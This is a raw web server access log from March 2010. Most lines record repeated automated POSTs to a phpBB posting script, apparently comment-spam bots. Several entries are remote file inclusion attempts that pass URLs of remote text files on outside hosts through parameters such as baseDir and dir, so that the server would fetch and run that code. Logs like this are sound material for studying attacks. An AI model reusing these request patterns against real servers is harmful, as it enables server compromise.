64.120.232.58 - - [11/Mar/2010:16:26:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:26:56 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:27:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:27:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:27:34 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:27:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:27:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:28:12 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:28:15 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:28:32 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:28:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:28:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:29:07 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:29:20 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:29:33 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:29:35 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
203.250.124.252 - - [11/Mar/2010:16:29:44 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 610 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
203.250.124.252 - - [11/Mar/2010:16:29:44 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 404 616 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
203.250.124.252 - - [11/Mar/2010:16:29:45 -0800] "GET /logs/showfile.php//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
203.250.124.252 - - [11/Mar/2010:16:29:45 -0800] "GET /logs/showfile.php/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.ingenieriacomercial.com/list/respon1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:29:58 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.90.164.110 - - [11/Mar/2010:16:30:01 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:30:04 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
209.235.254.107 - - [11/Mar/2010:16:30:19 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:30:22 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:30:31 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:30:37 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:31:01 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:31:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:31:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:31:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:31:40 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:32:01 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.39.140.138 - - [11/Mar/2010:16:32:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:32:03 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:32:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:32:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:32:42 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:32:59 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:33:00 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:33:20 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:33:32 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
69.20.70.31 - - [11/Mar/2010:16:33:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:33:44 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:33:58 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.17.253.220 - - [11/Mar/2010:16:34:04 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:34:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:34:14 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:34:29 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:34:40 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:34:56 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:35:01 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:35:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:35:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:35:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:35:55 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:36:05 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:36:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:36:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:36:42 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:36:51 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:36:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
208.109.21.238 - - [11/Mar/2010:16:37:02 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:37:20 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:37:22 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:37:45 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:37:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:38:04 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:38:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:38:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
212.95.226.66 - - [11/Mar/2010:16:38:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:38:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:38:49 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:39:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:39:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:39:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:39:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:39:46 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:40:07 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:40:15 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:40:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:40:43 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:40:50 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
62.149.226.208 - - [11/Mar/2010:16:41:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:41:08 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:41:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:41:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:41:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:41:49 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:42:05 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:42:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:42:27 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:16:42:44 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:42:47 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:16:43:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:16:43:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:22 -0800] "GET /logs//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:22 -0800] "GET /include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 591 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:23 -0800] "GET /logs/showfile.php/access.log//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
85.236.48.245 - - [11/Mar/2010:16:43:23 -0800] "GET /logs/showfile.php//include/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
